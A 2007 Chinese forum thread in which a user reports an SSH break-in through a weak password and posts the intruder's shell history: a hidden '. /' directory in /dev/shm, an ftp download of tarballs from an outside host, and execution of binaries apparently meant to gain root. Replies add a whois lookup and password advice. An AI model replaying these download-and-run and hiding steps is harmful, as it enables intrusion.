今天，被一个外国菜鸟黑了。

Jeremiah.R

太巧合了，\r\n今天，我在图书馆自修，自己的机器在寝室里开着。\r\n回来结果，一看吓了一大跳。\r\n按照我的习惯lastlog，\r\n一看，一个兄弟从AC83C13D.ipt.aol.com\r\nssh到我的主机。那小子运气太好了，我正好在路由器中\r\n大开了ssh NAT 到我的主机（我在图书馆有点东东要在我的机器上跑），\r\n我的用户名和密码都是一样的jeremiah:jeremiah\r\n这小子估计写了个程序（字典暴力破解），进入了我的系统。\r\n由于发现的及时，那小子还在做事，文件没有损失，历史记录还没有\r\n被修改。下面是他的小动作。\r\n 310  touch\r\n  311  uname\r\n  312  w\r\n  313  hostname\r\n  314  passwd\r\n  315  ls\r\n  316  cd /dev/shm\r\n  317  ls\r\n  318  mkdir \". /\"\r\n  319  cd \". /\"\r\n  320  ftp redclubtm.netfirms.com\r\n  321  ls\r\n  322  tar zxvf 0.tgz\r\n  323  tar zxvf copi.tgz\r\n  324  tar zxvf hosts.tgz\r\n  325  tar zxvf ker.tgz\r\n  326  tar zxvf newd.tgz\r\n  327  tar xvf newd.tgz\r\n  328  ls\r\n  329  rm -rf 0.tgz copi.tgz hosts.tgz ker.tgz newd.tgz\r\n  330  ls\r\n  331  chmod +x *\r\n  332  export PATH=.PATH\r\n  333  ker\r\n  334  0\r\n  335  rm -rf 0 ker\r\n  336  cd hosts\r\n  337  ls\r\n  338  rm -rf nobash.txt vuln.txt\r\n  339  chmod +x *\r\n  340  export PATH=.PATH\r\n\r\nMay 12 22:34:59 redhat passwd: pam_unix(passwd:chauthtok): password changed for jeremiah\r\nMay 12 22:48:37 redhat passwd: pam_unix(passwd:chauthtok): authentication failure; logname= uid=500 euid=0 tty=pts/2 ruser= rhost=  user=jeremiah\r\nMay 12 22:49:14 redhat passwd: pam_unix(passwd:chauthtok): authentication failure; logname= uid=500 euid=0 tty=pts/2 ruser= rhost=  user=jeremiah\r\n\r\n\r\n从这\r\n 318  mkdir \". /\"\r\n  319  cd \". /\"\r\n来看，这兄弟老玩了，不过本地提升为root，\r\n在我的机器上，是不可能的事.\r\n\r\n那些文件保密，有需要的联系我。\n\n[ 本帖最后由 Jeremiah.R 于 2007-5-13 01:42 编辑 ]

langue

172.131.193.61\r\n\r\n$ whois -h whois.arin.net 172.131.193.61\r\n\r\nOrgName:    America Online\r\nOrgID:      AOL\r\nAddress:    22000 AOL Way\r\nCity:       Dulles\r\nStateProv:  VA\r\nPostalCode: 20166\r\nCountry:    US\r\n\r\nNetRange:   172.128.0.0 - 172.191.255.255\r\nCIDR:       172.128.0.0/10\r\nNetName:    AOL-172BLK\r\nNetHandle:  NET-172-128-0-0-1\r\nParent:     NET-172-0-0-0-0\r\nNetType:    Direct Allocation\r\nNameServer: DAHA-01.NS.AOL.COM\r\nNameServer: DAHA-02.NS.AOL.COM\r\nNameServer: DAHA-07.NS.AOL.COM\r\nComment:    ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE\r\nRegDate:    2000-03-24\r\nUpdated:    2003-08-08\r\n\r\nRTechHandle: AOL-NOC-ARIN\r\nRTechName:   America Online, Inc.\r\nRTechPhone:  +1-703-265-4670\r\nRTechEmail:  domains@aol.net\r\n\r\nOrgAbuseHandle: AOL382-ARIN\r\nOrgAbuseName:   Abuse\r\nOrgAbusePhone:  +1-703-265-4670\r\nOrgAbuseEmail:  abuse@aol.net\r\n\r\nOrgNOCHandle: AOL236-ARIN\r\nOrgNOCName:   NOC\r\nOrgNOCPhone:  +1-703-265-4670\r\nOrgNOCEmail:  noc@aol.net\r\n\r\nOrgTechHandle: AOL-NOC-ARIN\r\nOrgTechName:   America Online, Inc.\r\nOrgTechPhone:  +1-703-265-4670\r\nOrgTechEmail:  domains@aol.net\r\n\r\n# ARIN WHOIS database, last updated 2007-05-11 19:10\r\n# Enter ? for additional hints on searching ARIN\'s WHOIS database.\r\n$

langue

密码少于 16 个数字、字母的组合就可能有生命危险。

npcomet

原帖由 langue 于 2007-5-13 08:13 发表\r\n密码少于 16 个数字、字母的组合就可能有生命危险。

\r\n是啊 密码不能太简单了

Jeremiah.R

密码少于 16 个数字、字母的组合就可能有生命危险。

\r\n我的老习惯了，user＝passwd\r\n以后要改一下.

phphp

我的密码是 ~^([\\w]{5})@\\\\1\\W[a-z]{3}$~\r\n主机保密

langue

原帖由 快乐玩家 于 2007-5-14 15:06 发表\r\n\r\n\r\n这样就夸张了吧？\r\n一般ssh密码超过6位的组合，一般人就没兴趣跑了吧？暴力的话太慢，也容易曝露，谁那么

\r\n\r\n 防患于未然。如果对方把某个密码文件弄下来离线破解呢？不一定是 SSH。\r\n总得加强安全意识。要知道，一根绳子受力以后容易断裂的就是它最脆弱的部位。\r\n如果觉得字母和数字的组合难记，可以换成符号试试。

hkcat2007

~^([\\w]{5})@\\\\1\\W[a-z]{3}$~\r\n请问上面的密码怎么记住的，别说用笔写下来，那是不安全的